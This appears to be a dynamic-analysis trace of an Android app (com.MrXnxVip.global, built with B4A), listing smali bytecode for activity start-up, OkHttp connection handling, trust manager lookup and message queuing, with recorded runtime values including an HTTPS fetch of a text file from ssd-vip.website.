                        39sget-object p1, Lcom/MrXnxVip/global/main;->previousOne:Ljava/lang/ref/WeakReference;
                        40if-eqz p1, :cond_4a
                        42invoke-virtual {p1}, Ljava/lang/ref/WeakReference;->get()Ljava/lang/Object;
                        43move-result-object p1
                        44check-cast p1, Landroid/app/Activity;
                        45if-eqz p1, :cond_4a
                        46if-eq p1, p0, :cond_4a
                        48const-string v0, "Killing previous instance (main)."
                        50invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        52invoke-virtual {p1}, Landroid/app/Activity;->finish()V
                        53goto_4a:
                        54sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        55const/4 v0, 0x1
                        57invoke-virtual {p1, v0}, Lanywheresoftware/b4a/BA;->setActivityPaused(Z)V
                        59sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        61const-string v1, "oncreate"
                        62const/4 v2, 0x0
                        64invoke-virtual {p1, v1, p0, v2}, Lanywheresoftware/b4a/BA;->runHook(Ljava/lang/String;Ljava/lang/Object;[Ljava/lang/Object;)Z
                        66invoke-virtual {p0}, Lcom/MrXnxVip/global/main;->getWindow()Landroid/view/Window;
                        67move-result-object p1
                        69invoke-virtual {p1, v0}, Landroid/view/Window;->requestFeature(I)Z
                        71sget-object p1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        73iget-object p1, p1, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        74iput-object v2, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->activityBA:Ljava/lang/ref/WeakReference;
                        75new-instance p1, Lanywheresoftware/b4a/BALayout;
                        77invoke-direct {p1, p0}, Lanywheresoftware/b4a/BALayout;-><init>(Landroid/content/Context;)V
                        78iput-object p1, p0, Lcom/MrXnxVip/global/main;->layout:Lanywheresoftware/b4a/BALayout;
                        80invoke-virtual {p0, p1}, Lcom/MrXnxVip/global/main;->setContentView(Landroid/view/View;)V
                        • Time: 685665
                          • This:
                            • com.MrXnxVip.global.main@ff69451
                          • p0: anywheresoftware.b4a.BALayout{9f7a3e0 V.E...... ......I. 0,0-0,0}
                        81const/4 p1, 0x0
                        82sput-boolean p1, Lcom/MrXnxVip/global/main;->afterFirstLayout:Z
                        83new-instance v0, Lcom/MrXnxVip/global/main$WaitForLayout;
                        85invoke-direct {v0}, Lcom/MrXnxVip/global/main$WaitForLayout;-><init>()V
                        87sget-object v1, Lcom/MrXnxVip/global/main;->processBA:Lanywheresoftware/b4a/BA;
                        89invoke-static {p0, v1, v0, p1}, Lanywheresoftware/b4a/objects/ServiceHelper$StarterHelper;->startFromActivity(Landroid/app/Activity;Lanywheresoftware/b4a/BA;Ljava/lang/Runnable;Z)Z
                        90move-result p1
                        91if-eqz p1, :cond_86
                        93sget-object p1, Lanywheresoftware/b4a/BA;->handler:Landroid/os/Handler;
                        94const-wide/16 v1, 0x5
                        96invoke-virtual {p1, v0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
                        97cond_86: return-void
                        Cross References
                        APIs
                        • java.lang.Thread.holdsLock
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Thread.currentThread
                        • java.lang.Thread.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.AssertionError.<init>
                        • java.lang.System.nanoTime
                        • java.net.Socket.isClosed
                        • java.net.Socket.isClosed
                        • java.net.Socket.isInputShutdown
                        • java.net.Socket.isOutputShutdown
                        Strings
                        • Thread
                        • Thread.currentThread()
                        • MUST NOT hold lock on
                        Position Instruction Meta Information
                        0sget-boolean v0, Lokhttp3/internal/Util;->assertionsEnabled:Z
                        1if-eqz v0, :cond_39
                        3invoke-static {p0}, Ljava/lang/Thread;->holdsLock(Ljava/lang/Object;)Z
                        4move-result v0
                        5if-nez v0, :cond_b
                        6goto/16 :goto_39
                        7cond_b: new-instance p1, Ljava/lang/AssertionError;
                        8new-instance v0, Ljava/lang/StringBuilder;
                        10invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        12const-string v1, "Thread "
                        14invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        16invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
                        17move-result-object v1
                        19const-string v2, "Thread.currentThread()"
                        21invoke-static {v1, v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        23invoke-virtual {v1}, Ljava/lang/Thread;->getName()Ljava/lang/String;
                        24move-result-object v1
                        26invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28const-string v1, " MUST NOT hold lock on "
                        30invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32invoke-virtual {v0, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        34invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        35move-result-object v0
                        37invoke-direct {p1, v0}, Ljava/lang/AssertionError;-><init>(Ljava/lang/Object;)V
                        38check-cast p1, Ljava/lang/Throwable;
                        39throw p1
                        40cond_39:
                        41invoke-static {}, Ljava/lang/System;->nanoTime()J
                        42move-result-wide v0
                        44iget-object v2, p0, Lokhttp3/internal/connection/RealConnection;->rawSocket:Ljava/net/Socket;
                        46invoke-static {v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        48iget-object v3, p0, Lokhttp3/internal/connection/RealConnection;->socket:Ljava/net/Socket;
                        50invoke-static {v3}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        52iget-object v4, p0, Lokhttp3/internal/connection/RealConnection;->source:Lokio/BufferedSource;
                        54invoke-static {v4}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        56invoke-virtual {v2}, Ljava/net/Socket;->isClosed()Z
                        • Time: 699267
                          • This:
                            • Socket[address=ssd-vip.website/104.21.33.223,port=443,localPort=48436]
                          • Return:
                            • false
                        57move-result v2
                        58if-nez v2, :cond_88
                        60invoke-virtual {v3}, Ljava/net/Socket;->isClosed()Z
                        • Time: 699268
                          • This:
                            • SSL socket over Socket[address=ssd-vip.website/104.21.33.223,port=443,localPort=48436]
                          • Return:
                            • false
                        61move-result v2
                        62if-nez v2, :cond_88
                        64invoke-virtual {v3}, Ljava/net/Socket;->isInputShutdown()Z
                        65move-result v2
                        66if-nez v2, :cond_88
                        68invoke-virtual {v3}, Ljava/net/Socket;->isOutputShutdown()Z
                        69move-result v2
                        70if-eqz v2, :cond_65
                        71goto/16 :goto_88
                        72cond_65:
                        73iget-object v2, p0, Lokhttp3/internal/connection/RealConnection;->http2Connection:Lokhttp3/internal/http2/Http2Connection;
                        74if-eqz v2, :cond_6e
                        76invoke-virtual {v2, v0, v1}, Lokhttp3/internal/http2/Http2Connection;->isHealthy(J)Z
                        77move-result p1
                        78return p1
                        79cond_6e: monitor-enter p0
                        80try_start_6f: iget-wide v5, p0, Lokhttp3/internal/connection/RealConnection;->idleAtNs:J
                        81try_end_71: sub-long/2addr v0, v5
                        82monitor-exit p0
                        83const-wide v5, 0x2540be400L
                        84cmp-long v2, v0, v5
                        85if-ltz v2, :cond_83
                        86if-eqz p1, :cond_83
                        88invoke-static {v3, v4}, Lokhttp3/internal/Util;->isHealthy(Ljava/net/Socket;Lokio/BufferedSource;)Z
                        89move-result p1
                        90return p1
                        91cond_83: const/4 p1, 0x1
                        92return p1
                        93catchall_85: move-exception p1
                        94monitor-exit p0
                        95throw p1
                        96goto_88: const/4 p1, 0x0
                        97return p1
                        APIs
                        • java.lang.ref.WeakReference.get
                        • java.lang.StringBuilder.<init>
                        • java.lang.Object.getClass
                        • java.lang.Class.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.Object.getClass
                        • java.lang.Class.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.RuntimeException.<init>
                        Strings
                        • Sleep failed to resume (ba = null)
                        • Sleep not resumed (context destroyed):
                        • sleep
                        • Sleep not resumed (context is paused):
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$ba:Lanywheresoftware/b4a/BA;
                        2if-nez v0, :cond_a
                        4const-string v0, "Sleep failed to resume (ba = null)"
                        6invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogError(Ljava/lang/String;)V
                        7return-void
                        8cond_a:
                        9iget-object v0, v0, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        10if-eqz v0, :cond_10
                        11const/4 v0, 0x1
                        12goto/16 :goto_11
                        13cond_10: const/4 v0, 0x0
                        14goto_11: if-eqz v0, :cond_47
                        16iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$ba:Lanywheresoftware/b4a/BA;
                        18iget-object v1, v1, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        20iget-object v1, v1, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        22iget-object v1, v1, Lanywheresoftware/b4a/BA$SharedProcessBA;->activityBA:Ljava/lang/ref/WeakReference;
                        23if-eqz v1, :cond_2b
                        25iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$ba:Lanywheresoftware/b4a/BA;
                        27iget-object v2, v1, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        29iget-object v2, v2, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        31iget-object v2, v2, Lanywheresoftware/b4a/BA$SharedProcessBA;->activityBA:Ljava/lang/ref/WeakReference;
                        33invoke-virtual {v2}, Ljava/lang/ref/WeakReference;->get()Ljava/lang/Object;
                        34move-result-object v2
                        35if-eq v1, v2, :cond_47
                        36cond_2b: new-instance v0, Ljava/lang/StringBuilder;
                        38const-string v1, "Sleep not resumed (context destroyed): "
                        40invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        42iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$rs:Lanywheresoftware/b4a/BA$ResumableSub;
                        44invoke-virtual {v1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        45move-result-object v1
                        47invoke-virtual {v1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        48move-result-object v1
                        50invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        53move-result-object v0
                        55invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        56return-void
                        57cond_47:
                        58iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$ba:Lanywheresoftware/b4a/BA;
                        60invoke-virtual {v1}, Lanywheresoftware/b4a/BA;->isActivityPaused()Z
                        • Time: 695786
                          • This:
                            • anywheresoftware.b4a.BA@eb7fd4
                          • Return:
                            • false
                        61move-result v1
                        62if-eqz v1, :cond_77
                        63if-eqz v0, :cond_5b
                        65iget-object v0, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$ba:Lanywheresoftware/b4a/BA;
                        67iget-object v0, v0, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        69const-string v1, "sleep"
                        71invoke-virtual {v0, v1, p0}, Lanywheresoftware/b4a/BA;->addMessageToPausedMessageQueue(Ljava/lang/String;Ljava/lang/Runnable;)V
                        72goto/16 :goto_76
                        73cond_5b: new-instance v0, Ljava/lang/StringBuilder;
                        75const-string v1, "Sleep not resumed (context is paused): "
                        77invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        79iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$rs:Lanywheresoftware/b4a/BA$ResumableSub;
                        81invoke-virtual {v1}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        82move-result-object v1
                        84invoke-virtual {v1}, Ljava/lang/Class;->getName()Ljava/lang/String;
                        85move-result-object v1
                        87invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        89invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        90move-result-object v0
                        92invoke-static {v0}, Lanywheresoftware/b4a/BA;->LogInfo(Ljava/lang/String;)V
                        93goto_76: return-void
                        94cond_77:
                        95iget-object v0, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$rs:Lanywheresoftware/b4a/BA$ResumableSub;
                        97iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$14;->val$ba:Lanywheresoftware/b4a/BA;
                        98const/4 v2, 0x0
                        100invoke-virtual {v0, v1, v2}, Lanywheresoftware/b4a/BA$ResumableSub;->resume(Lanywheresoftware/b4a/BA;[Ljava/lang/Object;)V
                        101try_end_7f: return-void
                        102catch_80: move-exception v0
                        103new-instance v1, Ljava/lang/RuntimeException;
                        105invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        106throw v1
                        Cross References
                        APIs
                        • java.lang.Thread.holdsLock
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.Thread.currentThread
                        • java.lang.Thread.getName
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.AssertionError.<init>
                        • java.util.concurrent.ConcurrentLinkedQueue.remove
                        • java.util.concurrent.ConcurrentLinkedQueue.isEmpty
                        Strings
                        • connection
                        • Thread
                        • Thread.currentThread()
                        • MUST hold lock on
                        Position Instruction Meta Information
                        1const-string v0, "connection"
                        3invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        4sget-boolean v0, Lokhttp3/internal/Util;->assertionsEnabled:Z
                        5if-eqz v0, :cond_3e
                        7invoke-static {p1}, Ljava/lang/Thread;->holdsLock(Ljava/lang/Object;)Z
                        8move-result v0
                        9if-eqz v0, :cond_10
                        10goto/16 :goto_3e
                        11cond_10: new-instance v0, Ljava/lang/AssertionError;
                        12new-instance v1, Ljava/lang/StringBuilder;
                        14invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        16const-string v2, "Thread "
                        18invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        20invoke-static {}, Ljava/lang/Thread;->currentThread()Ljava/lang/Thread;
                        21move-result-object v2
                        23const-string v3, "Thread.currentThread()"
                        25invoke-static {v2, v3}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        27invoke-virtual {v2}, Ljava/lang/Thread;->getName()Ljava/lang/String;
                        28move-result-object v2
                        30invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        32const-string v2, " MUST hold lock on "
                        34invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        36invoke-virtual {v1, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        38invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        39move-result-object p1
                        41invoke-direct {v0, p1}, Ljava/lang/AssertionError;-><init>(Ljava/lang/Object;)V
                        42check-cast v0, Ljava/lang/Throwable;
                        43throw v0
                        44goto_3e:
                        45invoke-virtual {p1}, Lokhttp3/internal/connection/RealConnection;->getNoNewExchanges()Z
                        • Time: 700192
                          • This:
                            • Connection{ssd-vip.website:443, proxy=DIRECT hostAddress=ssd-vip.website/104.21.33.223:443 cipherSuite=TLS_AES_128_GCM_SHA256 protocol=http/1.1}
                          • Return:
                            • true
                        46move-result v0
                        47const/4 v1, 0x1
                        48if-nez v0, :cond_5a
                        49iget v0, p0, Lokhttp3/internal/connection/RealConnectionPool;->maxIdleConnections:I
                        50if-nez v0, :cond_4a
                        51goto/16 :goto_5a
                        52cond_4a:
                        53iget-object v2, p0, Lokhttp3/internal/connection/RealConnectionPool;->cleanupQueue:Lokhttp3/internal/concurrent/TaskQueue;
                        55iget-object p1, p0, Lokhttp3/internal/connection/RealConnectionPool;->cleanupTask:Lokhttp3/internal/connection/RealConnectionPool$cleanupTask$1;
                        56move-object v3, p1
                        57check-cast v3, Lokhttp3/internal/concurrent/Task;
                        58const-wide/16 v4, 0x0
                        59const/4 v6, 0x2
                        60const/4 v7, 0x0
                        62invoke-static/range {v2 .. v7}, Lokhttp3/internal/concurrent/TaskQueue;->schedule$default(Lokhttp3/internal/concurrent/TaskQueue;Lokhttp3/internal/concurrent/Task;JILjava/lang/Object;)V
                        63const/4 v1, 0x0
                        64goto/16 :goto_6f
                        65goto_5a:
                        66invoke-virtual {p1, v1}, Lokhttp3/internal/connection/RealConnection;->setNoNewExchanges(Z)V
                        68iget-object v0, p0, Lokhttp3/internal/connection/RealConnectionPool;->connections:Ljava/util/concurrent/ConcurrentLinkedQueue;
                        70invoke-virtual {v0, p1}, Ljava/util/concurrent/ConcurrentLinkedQueue;->remove(Ljava/lang/Object;)Z
                        72iget-object p1, p0, Lokhttp3/internal/connection/RealConnectionPool;->connections:Ljava/util/concurrent/ConcurrentLinkedQueue;
                        74invoke-virtual {p1}, Ljava/util/concurrent/ConcurrentLinkedQueue;->isEmpty()Z
                        75move-result p1
                        76if-eqz p1, :cond_6f
                        78iget-object p1, p0, Lokhttp3/internal/connection/RealConnectionPool;->cleanupQueue:Lokhttp3/internal/concurrent/TaskQueue;
                        80invoke-virtual {p1}, Lokhttp3/internal/concurrent/TaskQueue;->cancelAll()V
                        81goto_6f: return v1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • $this$toHostHeader
                        • ssd-vip.website
                        • :
                        • java.lang.String@b8d1c0f
                        Position Instruction Meta Information
                        1const-string v0, "$this$toHostHeader"
                        3invoke-static {p0, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        5invoke-virtual {p0}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        • Time: 697368
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • ssd-vip.website
                        6move-result-object v0
                        7check-cast v0, Ljava/lang/CharSequence;
                        9const-string v1, ":"
                        10check-cast v1, Ljava/lang/CharSequence;
                        11const/4 v2, 0x0
                        12const/4 v3, 0x2
                        13const/4 v4, 0x0
                        15invoke-static {v0, v1, v2, v3, v4}, Lkotlin/text/StringsKt;->contains$default(Ljava/lang/CharSequence;Ljava/lang/CharSequence;ZILjava/lang/Object;)Z
                        16move-result v0
                        17if-eqz v0, :cond_33
                        18new-instance v0, Ljava/lang/StringBuilder;
                        20invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        21const/16 v1, 0x5b
                        23invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        25invoke-virtual {p0}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        26move-result-object v1
                        28invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        29const/16 v1, 0x5d
                        31invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        33invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        34move-result-object v0
                        35goto/16 :goto_37
                        36cond_33:
                        37invoke-virtual {p0}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        • Time: 697369
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • ssd-vip.website
                        38move-result-object v0
                        39goto_37: if-nez p1, :cond_49
                        41invoke-virtual {p0}, Lokhttp3/HttpUrl;->port()I
                        42move-result p1
                        44sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        46invoke-virtual {p0}, Lokhttp3/HttpUrl;->scheme()Ljava/lang/String;
                        • Time: 697370
                          • This:
                            • https://ssd-vip.website/lord/web.txt
                          • Return:
                            • java.lang.String@b8d1c0f
                        47move-result-object v2
                        49invoke-virtual {v1, v2}, Lokhttp3/HttpUrl$Companion;->defaultPort(Ljava/lang/String;)I
                        50move-result v1
                        51if-eq p1, v1, :cond_61
                        52cond_49: new-instance p1, Ljava/lang/StringBuilder;
                        54invoke-direct {p1}, Ljava/lang/StringBuilder;-><init>()V
                        56invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57const/16 v0, 0x3a
                        59invoke-virtual {p1, v0}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        61invoke-virtual {p0}, Lokhttp3/HttpUrl;->port()I
                        62move-result p0
                        64invoke-virtual {p1, p0}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
                        66invoke-virtual {p1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        67move-result-object v0
                        68cond_61: return-object v0
                        Cross References
                        APIs
                        • javax.net.ssl.TrustManagerFactory.getDefaultAlgorithm
                        • javax.net.ssl.TrustManagerFactory.getInstance
                        • javax.net.ssl.TrustManagerFactory.init
                        • javax.net.ssl.TrustManagerFactory.getTrustManagers
                        • java.lang.NullPointerException.<init>
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.util.Arrays.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalStateException.<init>
                        Strings
                        • PKIX
                        • factory
                        • null cannot be cast to non-null type javax.net.ssl.X509TrustManager
                        • Unexpected default trust managers:
                        • java.util.Arrays.toString(this)
                        Position Instruction Meta Information
                        1invoke-static {}, Ljavax/net/ssl/TrustManagerFactory;->getDefaultAlgorithm()Ljava/lang/String;
                        • Time: 697138
                          • Return:
                            • PKIX
                        2move-result-object v0
                        4invoke-static {v0}, Ljavax/net/ssl/TrustManagerFactory;->getInstance(Ljava/lang/String;)Ljavax/net/ssl/TrustManagerFactory;
                        5move-result-object v0
                        6const/4 v1, 0x0
                        7check-cast v1, Ljava/security/KeyStore;
                        9invoke-virtual {v0, v1}, Ljavax/net/ssl/TrustManagerFactory;->init(Ljava/security/KeyStore;)V
                        11const-string v1, "factory"
                        13invoke-static {v0, v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        15invoke-virtual {v0}, Ljavax/net/ssl/TrustManagerFactory;->getTrustManagers()[Ljavax/net/ssl/TrustManager;
                        16move-result-object v0
                        18invoke-static {v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNull(Ljava/lang/Object;)V
                        19array-length v1, v0
                        20const/4 v2, 0x1
                        21const/4 v3, 0x0
                        22if-ne v1, v2, :cond_26
                        23aget-object v1, v0, v3
                        24instance-of v1, v1, Ljavax/net/ssl/X509TrustManager;
                        25if-eqz v1, :cond_26
                        26goto/16 :goto_27
                        27cond_26: const/4 v2, 0x0
                        28goto_27: if-eqz v2, :cond_38
                        29aget-object v0, v0, v3
                        30if-eqz v0, :cond_30
                        31check-cast v0, Ljavax/net/ssl/X509TrustManager;
                        32return-object v0
                        33cond_30: new-instance v0, Ljava/lang/NullPointerException;
                        35const-string v1, "null cannot be cast to non-null type javax.net.ssl.X509TrustManager"
                        37invoke-direct {v0, v1}, Ljava/lang/NullPointerException;-><init>(Ljava/lang/String;)V
                        38throw v0
                        39cond_38: new-instance v1, Ljava/lang/StringBuilder;
                        41invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        43const-string v2, "Unexpected default trust managers: "
                        45invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        47invoke-static {v0}, Ljava/util/Arrays;->toString([Ljava/lang/Object;)Ljava/lang/String;
                        48move-result-object v0
                        50const-string v2, "java.util.Arrays.toString(this)"
                        52invoke-static {v0, v2}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        54invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        56invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        57move-result-object v0
                        58new-instance v1, Ljava/lang/IllegalStateException;
                        60invoke-virtual {v0}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        61move-result-object v0
                        63invoke-direct {v1, v0}, Ljava/lang/IllegalStateException;-><init>(Ljava/lang/String;)V
                        64check-cast v1, Ljava/lang/Throwable;
                        65throw v1
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.ArrayList.<init>
                        • java.util.ArrayList.size
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.ArrayList.add
                        Strings
                        • sending message to waiting queue (
                        • )
                        • sending message to waiting queue (CallSubDelayed - JobDone)
                        • Ignoring event (too many queued events:
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        2if-eqz v0, :cond_8
                        4invoke-virtual {v0, p1, p2}, Lanywheresoftware/b4a/BA;->addMessageToPausedMessageQueue(Ljava/lang/String;Ljava/lang/Runnable;)V
                        5return-void
                        6cond_8: new-instance v0, Ljava/lang/StringBuilder;
                        8const-string v1, "sending message to waiting queue ("
                        10invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        12invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        14const-string v1, ")"
                        16invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v0
                        21invoke-static {v0}, Lanywheresoftware/b4a/BA;->Log(Ljava/lang/String;)V
                        • Time: 700226
                          • p0: sending message to waiting queue (CallSubDelayed - JobDone)
                        23iget-object v0, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        25iget-object v0, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->messagesDuringPaused:Ljava/util/ArrayList;
                        26if-nez v0, :cond_2d
                        28iget-object v0, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        29new-instance v2, Ljava/util/ArrayList;
                        31invoke-direct {v2}, Ljava/util/ArrayList;-><init>()V
                        32iput-object v2, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->messagesDuringPaused:Ljava/util/ArrayList;
                        33cond_2d:
                        34iget-object v0, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        36iget-object v0, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->messagesDuringPaused:Ljava/util/ArrayList;
                        38invoke-virtual {v0}, Ljava/util/ArrayList;->size()I
                        39move-result v0
                        40const/16 v2, 0x14
                        41if-le v0, v2, :cond_4e
                        42new-instance p2, Ljava/lang/StringBuilder;
                        44const-string v0, "Ignoring event (too many queued events: "
                        46invoke-direct {p2, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        48invoke-virtual {p2, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        50invoke-virtual {p2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        52invoke-virtual {p2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        53move-result-object p1
                        55invoke-static {p1}, Lanywheresoftware/b4a/BA;->Log(Ljava/lang/String;)V
                        56goto/16 :goto_55
                        57cond_4e:
                        58iget-object p1, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        60iget-object p1, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->messagesDuringPaused:Ljava/util/ArrayList;
                        62invoke-virtual {p1, p2}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
